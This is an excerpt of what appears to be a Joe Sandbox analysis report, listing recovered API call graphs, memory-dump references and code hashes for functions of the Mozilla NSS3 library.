                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE8E07E
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CE8E090
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE8E0AF
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4073542275-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: dcd7c964e395e7bd9ed8b2192439fbc79773d5f7a084fc9bdd8739f6f0b72167
                                                                                                                                                                                                                                                                                                                      • Instruction ID: af4759430fa512161383419a9922af274f802ec679c8855e44c6445d3c9e7d0c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcd7c964e395e7bd9ed8b2192439fbc79773d5f7a084fc9bdd8739f6f0b72167
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC51AD79A02A009FEB209F24D845B6773B5BF45318F304929E85E87FA1D731E949CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6CE8BD1E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE62F0A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE62F1D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CE6B41E,00000000,00000000,?,00000000,?,6CE6B41E,00000000,00000000,00000001,?), ref: 6CEA57E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CEA5843
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE8BD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFAB0: free.MOZGLUE(?,-00000001,?,?,6CE5F673,00000000,00000000), ref: 6CEBFAC7
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6CE8BD9B
                                                                                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CE8BDA9
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE8BE3A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE63EC2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE63ED6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE63EEE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE63F02
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: PL_FreeArenaPool.NSS3 ref: 6CE63F14
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE63F27
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE8BE52
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE62CDA,?,00000000), ref: 6CE62E1E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CE62E33
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: TlsGetValue.KERNEL32 ref: 6CE62E4E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: EnterCriticalSection.KERNEL32(?), ref: 6CE62E5E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PL_HashTableLookup.NSS3(?), ref: 6CE62E71
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PL_HashTableRemove.NSS3(?), ref: 6CE62E84
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CE62E96
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PR_Unlock.NSS3 ref: 6CE62EA9
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE8BE61
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2178860483-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 117b47aef693315fbb5af973a2e8aad3273a3c108fdaba7b3a21cbf7677993a8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0b7f405f8610fcea081196169f2c189fa2c34ee8f0b690161b1260f94321fb2f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 117b47aef693315fbb5af973a2e8aad3273a3c108fdaba7b3a21cbf7677993a8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D641C0B6E01610AFD710CF28DC80A6A77F4EB45718F244168F90DAB752E735E908CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CEAAB3E,?,?,?), ref: 6CEAAC35
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CE8CF16
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CEAAB3E,?,?,?), ref: 6CEAAC55
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CEAAB3E,?,?), ref: 6CEAAC70
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8E300: TlsGetValue.KERNEL32 ref: 6CE8E33C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8E300: EnterCriticalSection.KERNEL32(?), ref: 6CE8E350
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8E300: PR_Unlock.NSS3(?), ref: 6CE8E5BC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CE8E5CA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8E300: TlsGetValue.KERNEL32 ref: 6CE8E5F2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8E300: EnterCriticalSection.KERNEL32(?), ref: 6CE8E606
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8E300: PORT_Alloc_Util.NSS3(?), ref: 6CE8E613
                                                                                                                                                                                                                                                                                                                      • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CEAAC92
                                                                                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CEAAB3E), ref: 6CEAACD7
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6CEAAD10
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CEAAD2B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8F360: TlsGetValue.KERNEL32(00000000,?,6CEAA904,?), ref: 6CE8F38B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8F360: EnterCriticalSection.KERNEL32(?,?,?,6CEAA904,?), ref: 6CE8F3A0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE8F360: PR_Unlock.NSS3(?,?,?,?,6CEAA904,?), ref: 6CE8F3D3
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: bce2ce69593e89f817a505edb931bd626a8da9cc18fd9313b73fbb721d16b512
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 85e3459f0aeebe82cb612cd6e4cb3070ffc144c4480214d55a50d277b67c12be
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce2ce69593e89f817a505edb931bd626a8da9cc18fd9313b73fbb721d16b512
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF312AB1E407056FEB008FA5DC409AF7676EF8571CB29852CE8196B740EB31DD068BA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6CE88C7C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DC6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DD1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF29DED
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE88CB0
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE88CD1
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE88CE5
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE88D2E
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CE88D62
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE88D93
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6825d495d12828da14ae9ba4764a4fbceab87dd97fb470817fd787826b2fbdb0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2c7f05e780573cf3645c0f8c9283f0db1cbc814cc480c11c625ae901298e269d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6825d495d12828da14ae9ba4764a4fbceab87dd97fb470817fd787826b2fbdb0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF312871E02205AFD720AF68DC447AAB7B8BF55318F24013AEE1D67B90D770A924C7D1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CEC9C5B), ref: 6CEC9D82
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CEC9C5B), ref: 6CEC9DA9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CEC136A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CEC137E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: PL_ArenaGrow.NSS3(?,6CE5F599,?,00000000,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?), ref: 6CEC13CF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: PR_Unlock.NSS3(?,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CEC145C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CEC9C5B), ref: 6CEC9DCE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE5F599,?,00000000), ref: 6CEC13F0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1340: PL_ArenaGrow.NSS3(?,6CE5F599,?,?,?,00000000,00000000,?,6CE6895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CEC1445
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,6CEC9C5B), ref: 6CEC9DDC
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CEC9C5B), ref: 6CEC9DFE
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CEC9C5B), ref: 6CEC9E43
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CEC9C5B), ref: 6CEC9E91
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CEBFAAB,00000000), ref: 6CEC157E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CEBFAAB,00000000), ref: 6CEC1592
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1560: memset.VCRUNTIME140(?,00000000,?), ref: 6CEC1600
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1560: PL_ArenaRelease.NSS3(?,?), ref: 6CEC1620
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC1560: PR_Unlock.NSS3(?), ref: 6CEC1639
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3425318038-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b942ee04781b9668540557af4ea879764d7aae4df4656deec6615f3a09164653
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 644171B4601606AFE7409F55DA50B92BBB1FF5534CF248128D8244BFA1EB76E834CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CE8DDEC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC08B4
                                                                                                                                                                                                                                                                                                                      • PK11_DigestBegin.NSS3(00000000), ref: 6CE8DE70
                                                                                                                                                                                                                                                                                                                      • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CE8DE83
                                                                                                                                                                                                                                                                                                                      • HASH_ResultLenByOidTag.NSS3(?), ref: 6CE8DE95
                                                                                                                                                                                                                                                                                                                      • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CE8DEAE
                                                                                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CE8DEBB
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE8DECC
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1091488953-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 36b9365a7e25df94c792f702e1aca6becefbbff35ae3558c65be2181964a6024
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0116365568bd36b9914d81319fb4bb6092a7b597123ac45ef1af4d515091f866
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36b9365a7e25df94c792f702e1aca6becefbbff35ae3558c65be2181964a6024
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A31E6B6E012156BDB00AA68AC41BBB76B8DF55608F25012AEC0DA7741FB31DA14C6F2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE67E48
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6CE67E5B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE67E7B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
                                                                                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CF8925C,?), ref: 6CE67E92
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF918D0,?), ref: 6CEBB095
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE67EA1
